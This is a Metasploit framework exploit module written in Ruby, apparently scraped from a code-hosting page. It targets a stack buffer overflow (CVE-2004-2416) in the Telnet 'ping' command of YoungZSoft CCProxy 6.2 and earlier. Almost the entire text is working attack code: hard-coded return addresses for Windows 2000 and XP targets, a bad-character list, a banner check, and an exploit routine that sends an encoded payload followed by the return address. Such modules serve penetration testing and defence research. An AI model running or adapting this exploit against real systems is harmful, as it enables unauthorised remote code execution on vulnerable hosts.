Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'CCProxy Telnet Proxy Ping Overflow',13'Description' => %q{14This module exploits the YoungZSoft CCProxy <= v6.2 suite15Telnet service. The stack is overwritten when sending an overly16long address to the 'ping' command.17},18'Author' => [ 'aushack' ],19'Arch' => [ ARCH_X86 ],20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2004-2416' ],24[ 'OSVDB', '11593' ],25[ 'BID', '11666' ],26[ 'EDB', '621' ],27],28'Privileged' => false,29'DefaultOptions' =>30{31'EXITFUNC' => 'thread',32},33'Payload' =>34{35'Space' => 1012,36'BadChars' => "\x00\x07\x08\x0a\x0d\x20",37},38'Platform' => ['win'],39'Targets' =>40[41# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.42[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll43[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll44[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll45[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll46[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll47],48'DisclosureDate' => '2004-11-11'))4950register_options(51[52Opt::RPORT(23),53])54end5556def check57connect58banner = sock.get_once || ''59disconnect6061if banner.to_s =~ /CCProxy Telnet Service Ready/62return Exploit::CheckCode::Detected63end64return Exploit::CheckCode::Safe65end6667def exploit68connect6970sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)71sock.put(sploit + "\r\n")7273handler74disconnect75end76end777879